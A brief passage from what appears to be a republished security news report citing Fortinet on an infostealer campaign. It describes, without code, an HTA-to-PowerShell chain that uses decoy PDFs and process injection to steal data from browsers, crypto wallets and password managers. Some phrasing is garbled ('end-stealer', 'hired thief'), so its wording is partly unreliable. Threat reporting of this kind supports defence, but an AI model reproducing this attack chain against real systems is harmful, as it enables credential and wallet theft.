Once the HTA script, a standalone Windows program written in HTML, is executed, it runs a PowerShell code that ends up creating C2, downloading deceptive PDF files to avoid, and malicious shell injection.
“These files aim to insert the end-stealer into legitimate processes, launch malicious actions and send the stolen data back to the C2 server,” added Fortinet.
The target applications of the hired thief include web browsers, crypto wallets, messengers, email clients, VPN services, password managers, AnyDesk, and MySQL Workbench, among many others.
Source link